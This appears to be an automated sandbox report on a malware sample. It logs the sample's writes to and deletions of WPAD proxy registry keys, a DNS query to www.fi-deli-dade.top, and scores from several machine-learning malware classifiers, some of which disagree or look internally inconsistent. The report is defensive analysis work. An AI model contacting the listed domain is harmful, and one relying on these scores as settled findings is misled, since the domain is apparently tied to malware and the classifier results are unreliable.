19/2/2020 - 19:45:45.340 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDetectedUrl
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60} | WpadDecisionReason
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60} | WpadDecisionTime
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60} | WpadDecision
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60} | WpadNetworkName
19/2/2020 - 19:45:46.637 | Delete | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{D8C667F4-C62D-460A-82E2-EC8687C3DC60} | WpadDetectedUrl
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecisionReason
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecisionTime
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecision
19/2/2020 - 19:45:46.637 | Delete | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDetectedUrl
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecisionReason
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecisionTime
19/2/2020 - 19:45:46.637 | Write | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDecision
19/2/2020 - 19:45:46.637 | Delete | 1480 | C:\malware.exe | HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\52-54-00-83-08-f3 | WpadDetectedUrl

File Summary
Created Identified: False
Deleted Identified: False

Process Summary
Created Identified: False
Deleted Identified: False

Registry Summary
Proxy Identified: False
AutoRun Identified: False
Created Identified: True
Deleted Identified: True
Browsers Identified: False
Internet Identified: True


DNS
Query
localhost -> gateway:50273  www.fi-deli-dade.top.
localhost -> gateway:DNS  www.fi-deli-dade.top.

Response

TCP
Info

UDP
Info
localhost:53 -> localhost:50273
localhost:50273 -> localhost:53
localhost:67 -> localhost:68
localhost:68 -> 255.255.255.255:67

HTTP
Info

Summary
DNS: True
TCP: False
UDP: True
HTTP: False

Results
BINARY
KNN (K=3, NFS-BRMalware)
confidence: 100.00%
suspicious: True

Decision Tree (NFS-BRMalware)
confidence: 100.00%
suspicious: True

SVC (Kernel=Linear, NFS-BRMalware)
confidence: 42.09%
suspicious: False

MalConv (Ember: Raw Bytes, Threshold=0.5)
confidence: 97.89%
suspicious: True

Random Forest (100 estimators, NFS-BRMalware)
confidence: 66.00%
suspicious: True

Non-Negative MalConv (Ember: Raw Bytes, Threshold=0.35)
confidence: 91.08%
suspicious: False

LightGBM (Ember: File Characteristics, Threshold=0.8336)
confidence: 59.57%
suspicious: False
